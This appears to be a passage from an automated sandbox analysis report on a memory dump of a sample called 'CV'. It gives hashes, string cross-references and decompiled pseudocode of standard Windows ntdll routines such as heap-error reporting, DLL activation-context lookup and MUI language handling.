Opcode ID: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
Instruction ID: ec4760e97ea34c4893b4c2f0f1c3c0839a63adc064fb9e7b2d885e1f18e7e498
Opcode Fuzzy Hash: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
Instruction Fuzzy Hash: 9BD0C2712002187BC620DB89CC45FD33B9CDF44794F004065BA0C5B242C530BA00C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0128967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289694

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f34d2af30a5421c8267b3b85307e4637b6323f22658e8176bd1b3f6bcb3bf26a
Instruction ID: 4afdc38d2332c62cabf69f2b0908090e8fa429e6cf4ded6282929a16b5bc892c
Opcode Fuzzy Hash: f34d2af30a5421c8267b3b85307e4637b6323f22658e8176bd1b3f6bcb3bf26a
Instruction Fuzzy Hash: A4B09B719124D5C9DF11E7B44708737790077D0745F16C051D2020645B4778C4D1F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 012FB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

an invalid address, %p, xrefs: 012FB4CF
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 012FB323
a NULL pointer, xrefs: 012FB4E0
*** A stack buffer overrun occurred in %ws:%s, xrefs: 012FB2F3
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012FB3D6
write to, xrefs: 012FB4A6
Go determine why that thread has not released the critical section., xrefs: 012FB3C5
<unknown>, xrefs: 012FB27E, 012FB2D1, 012FB350, 012FB399, 012FB417, 012FB48E
*** An Access Violation occurred in %ws:%s, xrefs: 012FB48F
The instruction at %p tried to %s , xrefs: 012FB4B6
The instruction at %p referenced memory at %p., xrefs: 012FB432
The critical section is owned by thread %p., xrefs: 012FB3B9
*** then kb to get the faulting stack, xrefs: 012FB51C
*** enter .exr %p for the exception record, xrefs: 012FB4F1
*** enter .cxr %p for the context, xrefs: 012FB50D
The resource is owned exclusively by thread %p, xrefs: 012FB374
*** Resource timeout (%p) in %ws:%s, xrefs: 012FB352
The resource is owned shared by %d threads, xrefs: 012FB37E
*** Inpage error in %ws:%s, xrefs: 012FB418
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 012FB476
read from, xrefs: 012FB4AD, 012FB4B2
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012FB38F
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 012FB484
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 012FB314
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 012FB305
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 012FB53F
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 012FB2DC
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 012FB39B
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 012FB47D
This failed because of error %Ix., xrefs: 012FB446

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 9285421a7c8422c36a8ccec3ac0c77df49ba618f30489f3650fef9b3c75bb8f4
Instruction ID: ab15d8b0303ea669656c8992d11b2eda88ebf547c2a709c3d50d47f2755cf0f2
Opcode Fuzzy Hash: 9285421a7c8422c36a8ccec3ac0c77df49ba618f30489f3650fef9b3c75bb8f4
Instruction Fuzzy Hash: 6C8126B5A70205FFEB255B4ACC9AE7B7F36EF96A52F41405CF7041B112D2A18411C772

Uniqueness

Uniqueness Score: -1.00%

Function 01301C06 Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01301C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x12248a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0124B150();
				} else {
					E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x133589c);
				E0124B150("Heap error detected at %p (heap handle %p)\n",  *0x13358a0);
				_t27 =  *0x1335898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01301E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0124B150();
				} else {
					E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0124B150("Error code: %d - %s\n",  *0x1335898);
				_t113 =  *0x13358a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0124B150();
					} else {
						E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0124B150("Parameter1: %p\n",  *0x13358a4);
				}
				_t115 =  *0x13358a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0124B150();
					} else {
						E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0124B150("Parameter2: %p\n",  *0x13358a8);
				}
				_t117 =  *0x13358ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0124B150();
					} else {
						E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0124B150("Parameter3: %p\n",  *0x13358ac);
				}
				_t119 =  *0x13358b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0124B150();
					} else {
						E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x13358b4);
					E0124B150("Last known valid blocks: before - %p, after - %p\n",  *0x13358b0);
				} else {
					_t120 =  *0x13358b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0124B150();
				} else {
					E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0124B150("Stack trace available at %p\n", 0x13358c0);
			}

0x01301c10
0x01301c16
0x01301c1e
0x01301c3d
0x01301c3e
0x01301c20
0x01301c35
0x01301c3a
0x01301c44
0x01301c55
0x01301c5a
0x01301c65
0x01301c67
0x00000000
0x01301c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01301c67
0x01301cdc
0x01301ce5
0x01301d04
0x01301d05
0x01301ce7
0x01301cfc
0x01301d01
0x01301d0b
0x01301d17
0x01301d1f
0x01301d25
0x01301d30
0x01301d4f
0x01301d50
0x01301d32
0x01301d47
0x01301d4c
0x01301d61
0x01301d67
0x01301d68
0x01301d6e
0x01301d79
0x01301d98
0x01301d99
0x01301d7b
0x01301d90
0x01301d95
0x01301daa
0x01301db0
0x01301db1
0x01301db7
0x01301dc2
0x01301de1
0x01301de2
0x01301dc4
0x01301dd9
0x01301dde
0x01301df3
0x01301df9
0x01301dfa
0x01301e00
0x01301e0a
0x01301e13
0x01301e32
0x01301e33
0x01301e15
0x01301e2a
0x01301e2f
0x01301e39
0x01301e4a
0x01301e02
0x01301e02
0x01301e08
0x00000000
0x00000000
0x01301e08
0x01301e5b
0x01301e7a
0x01301e7b
0x01301e5d
0x01301e72
0x01301e77
0x01301e95

Strings

Error code: %d - %s, xrefs: 01301D12
heap_failure_buffer_underrun, xrefs: 01301C9F
heap_failure_unknown, xrefs: 01301C75
heap_failure_internal, xrefs: 01301C6E
Parameter1: %p, xrefs: 01301D5C
heap_failure_virtual_block_corruption, xrefs: 01301C91
heap_failure_generic, xrefs: 01301C7C
heap_failure_lfh_bitmap_mismatch, xrefs: 01301CD7
heap_failure_invalid_allocation_type, xrefs: 01301CB4
Parameter3: %p, xrefs: 01301DEE
heap_failure_buffer_overrun, xrefs: 01301C98
HEAP: , xrefs: 01301C16, 01301C3D, 01301D04, 01301D4F, 01301D98, 01301DE1, 01301E32, 01301E7A
heap_failure_freelists_corruption, xrefs: 01301CC9
heap_failure_multiple_entries_corruption, xrefs: 01301C8A
heap_failure_listentry_corruption, xrefs: 01301CD0
heap_failure_usage_after_free, xrefs: 01301CBB
Parameter2: %p, xrefs: 01301DA5
Stack trace available at %p, xrefs: 01301E86
Last known valid blocks: before - %p, after - %p, xrefs: 01301E45
heap_failure_cross_heap_operation, xrefs: 01301CC2
Heap error detected at %p (heap handle %p), xrefs: 01301C50
heap_failure_entry_corruption, xrefs: 01301C83
heap_failure_invalid_argument, xrefs: 01301CAD
heap_failure_block_not_busy, xrefs: 01301CA6
HEAP[%wZ]: , xrefs: 01301C30, 01301CF7, 01301D42, 01301D8B, 01301DD4, 01301E25, 01301E6D

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: b684d12f618363ad086d5a57213ca4aa0cfc0ab745b6129207ab68526a5678a0
Instruction ID: 79aa26e161bd58424966b9908d5595f719b16b8b8c90ab958102ac3c0abbb6e5
Opcode Fuzzy Hash: b684d12f618363ad086d5a57213ca4aa0cfc0ab745b6129207ab68526a5678a0
Instruction Fuzzy Hash: BE61CF73631149DFD726AB99E4A5E3477E8EB54B24F0A802AF90E5F781D634DC40CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 01278E00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126
timeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E01278E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x133d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1338464; // 0x74cc0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1335780 & 0x00000003) != 0) {
							E012C5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1335780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0128B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1337984; // 0xca2b28
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1338464; // 0x74cc0110
					 *0x133b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01279B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1335780 & 0x00000005) != 0) {
						_push(_t49);
						E012C5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01278e0f
0x01278e16
0x01278e19
0x01278e1b
0x01278e21
0x01278e7f
0x01278e85
0x012b9354
0x012b936c
0x012b9371
0x012b937b
0x012b9381
0x012b9381
0x012b937b
0x01278e9d
0x01278e9d
0x01278e29
0x01278e2c
0x01278e38
0x01278e3e
0x01278e43
0x01278eb5
0x01278eb9
0x012b92aa
0x012b92af
0x012b92e8
0x012b92e8
0x012b92af
0x01278eb9
0x01278e45
0x01278e53
0x01278e5b
0x01278e5f
0x01278e78
0x01278e78
0x01278e7d
0x01278ec3
0x01278ecd
0x01278ed2
0x01278ed2
0x01278ec5
0x01278ec5
0x00000000
0x01278e7d
0x01278e67
0x01278ea4
0x012b931a
0x00000000
0x00000000
0x012b9320
0x01278ea4
0x01278e70
0x012b9325
0x012b9340
0x012b9345
0x012b9345
0x01278e76
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01278E53

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 012B933B, 012B9367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 012B932A
Querying the active activation context failed with status 0x%08lx, xrefs: 012B9357
LdrpFindDllActivationContext, xrefs: 012B9331, 012B935D

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 7c1679b82732b409662c19067d98ffa96ea464326149bde219b0ed8f21fb986b
Instruction ID: bfd3be0d9c734aac24e8769d3923c20dbc2d2c4946f1af38c02a01e7ab6dcec9
Opcode Fuzzy Hash: 7c1679b82732b409662c19067d98ffa96ea464326149bde219b0ed8f21fb986b
Instruction Fuzzy Hash: C5410D32A30317AFEF36AB1CD88DB7776B5AB04754F054969FB0897152E7B05D808381

Uniqueness

Uniqueness Score: -1.00%

Function 01253D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01253D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01251B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01251B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01251B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01251B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01251B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01264620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0128F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01291370(_t276, 0x1224e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0128BB40(0,  &_v68, _t170);
									if(L012543C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0128BB40(_t257,  &_v68, _t243);
								if(L012543C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01291370(_t278, 0x1224e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01264620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0128F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01291370(_v16, 0x1224e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0128BB40(_t262,  &_v68, _t244);
								if(L012543C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01291370(_t282, 0x1224e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0128BB40(_t262,  &_v68, _t201);
							if(L012543C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01264620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0128F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01291370(_t280, 0x1224e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0128BB40(_t267,  &_v68, _t245);
							if(L012543C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01291370(_t284, 0x1224e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0128BB40(_t267,  &_v68, _t224);
						if(L012543C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01253d3c
0x01253d42
0x01253d44
0x01253d46
0x01253d49
0x01253d4c
0x01253d4f
0x01253d52
0x01253d55
0x01253d58
0x01253d5b
0x01253d5f
0x01253d61
0x01253d66
0x012a8213
0x012a8218
0x01254085
0x01254088
0x0125408e
0x01254094
0x0125409a
0x012540a0
0x012540a6
0x012540a9
0x012540af
0x012540b6
0x012540bd
0x012540bd
0x01253d83
0x012a821f
0x012a8229
0x012a8238
0x012a8238
0x012a823d
0x012a823d
0x01253da0
0x01253daf
0x01253db5
0x01253dba
0x01253dba
0x01253dd4
0x01253e94
0x01253eab
0x01253f6d
0x01253f84
0x0125406b
0x0125406b
0x0125406e
0x0125406e
0x01254070
0x01254074
0x012a8351
0x012a8351
0x0125407a
0x0125407f
0x012a835d
0x012a8370
0x012a8377
0x012a8379
0x012a837c
0x012a837c
0x012a835d
0x00000000
0x0125407f
0x01253f8a
0x01253f8d
0x01253f90
0x01253f95
0x012a830d
0x012a830f
0x01253f9b
0x01253fac
0x01253fae
0x01253fb1
0x01253fb1
0x01253fb6
0x012a8317
0x012a831a
0x00000000
0x01253fbc
0x01253fc1
0x01253fc9
0x01253fd7
0x01253fda
0x01253fdd
0x01254021
0x01254021
0x01254029
0x01254030
0x01254044
0x01254046
0x01254046
0x01254044
0x01254049
0x012a8327
0x012a8334
0x012a8339
0x012a833c
0x0125404f
0x0125404f
0x0125404f
0x01254051
0x01254056
0x01254063
0x01254063
0x01254068
0x00000000
0x01254068
0x01253fdf
0x01253fe2
0x01253fe4
0x01253fe7
0x01253fef
0x01254003
0x01254005
0x01254005
0x0125400c
0x01254013
0x01254016
0x01254017
0x0125401b
0x0125401e
0x00000000
0x0125401e
0x01253fb6
0x01253eb1
0x01253eb4
0x01253eb7
0x01253ebc
0x012a82a9
0x012a82ab
0x01253ec2
0x01253ed3
0x01253ed5
0x01253ed8
0x01253ed8
0x01253edd
0x012a82b3
0x012a82b6
0x00000000
0x01253ee3
0x01253ee8
0x01253eed
0x01253ef0
0x01253ef3
0x01253f02
0x01253f05
0x01253f08
0x012a82c0
0x012a82c3
0x012a82c5
0x012a82c8
0x012a82d0
0x012a82e4
0x012a82e6
0x012a82e6
0x012a82ed
0x012a82f4
0x012a82f7
0x012a82f8
0x012a82fc
0x012a82ff
0x012a82ff
0x01253f0e
0x01253f11
0x01253f16
0x01253f1d
0x01253f31
0x012a8307
0x012a8307
0x01253f31
0x01253f39
0x01253f48
0x01253f4d
0x01253f50
0x01253f50
0x01253f53
0x01253f58
0x01253f65
0x01253f65
0x01253f6a
0x00000000
0x01253f6a
0x01253edd
0x01253dda
0x01253ddd
0x01253de0
0x01253de5
0x012a8245
0x01253deb
0x01253df7
0x01253dfc
0x01253dfe
0x01253e01
0x01253e01
0x01253e06
0x012a824d
0x012a824f
0x012a8254
0x00000000
0x01253e0c
0x01253e11
0x01253e16
0x01253e19
0x01253e29
0x01253e2c
0x01253e2f
0x012a825c
0x012a825f
0x012a8261
0x012a8264
